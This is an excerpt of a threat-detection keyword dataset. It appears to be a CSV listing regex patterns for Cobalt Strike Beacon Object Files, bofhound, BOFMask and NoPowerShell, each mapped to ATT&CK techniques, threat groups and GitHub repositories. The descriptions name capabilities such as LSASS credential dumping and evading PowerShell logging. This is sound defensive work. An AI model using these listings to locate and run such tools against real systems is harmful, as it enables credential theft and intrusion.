"*BOF-ForeignLsass*",".{0,1000}BOF\-ForeignLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","N/A","10","10","100","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z","36122"
"*bofhound --*",".{0,1000}bofhound\s\-\-.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","36123"
"*bofhound -i *",".{0,1000}bofhound\s\-i\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","36124"
"*bofhound -o *",".{0,1000}bofhound\s\-o\s.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","36125"
"*bofhound-main*",".{0,1000}bofhound\-main.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","36126"
"*BOF-IShellWindows-DCOM.*",".{0,1000}BOF\-IShellWindows\-DCOM\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","36127"
"*BofLdapSignCheck*",".{0,1000}BofLdapSignCheck.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","N/A","10","10","189","25","2024-08-07T09:32:20Z","2022-02-24T20:25:31Z","36128"
"*bofloader.bin*",".{0,1000}bofloader\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","N/A","10","10","193","28","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z","36129"
"*BOFMask-main*",".{0,1000}BOFMask\-main.{0,1000}","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","N/A","10","2","120","27","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z","36130"
"*bofnet*SeriousSam.*",".{0,1000}bofnet.{0,1000}SeriousSam\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","36131"
"*BOFNET.Bofs*",".{0,1000}BOFNET\.Bofs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36132"
"*BOFNET.Bofs.Jobs*",".{0,1000}BOFNET\.Bofs\.Jobs.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36133"
"*bofnet.cna*",".{0,1000}bofnet\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36134"
"*bofnet.cna*",".{0,1000}bofnet\.cna.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36135"
"*BOFNET.csproj*",".{0,1000}BOFNET\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36136"
"*BOFNET.dll*",".{0,1000}BOFNET\.dll.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36137"
"*BOFNET.dll*",".{0,1000}BOFNET\.dll.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36138"
"*BOFNET.sln*",".{0,1000}BOFNET\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","1","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36139"
"*bofnet_boo *.boo*",".{0,1000}bofnet_boo\s.{0,1000}\.boo.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36140"
"*bofnet_execute *",".{0,1000}bofnet_execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CCob/BOF.NET","1","0","N/A","N/A","10","10","709","105","2024-09-04T17:10:23Z","2020-11-02T20:02:55Z","36141"
"*bofnet_execute *",".{0,1000}bofnet_execute\s.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36142"
"*bofnet_execute.*",".{0,1000}bofnet_execute\..{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","36143"
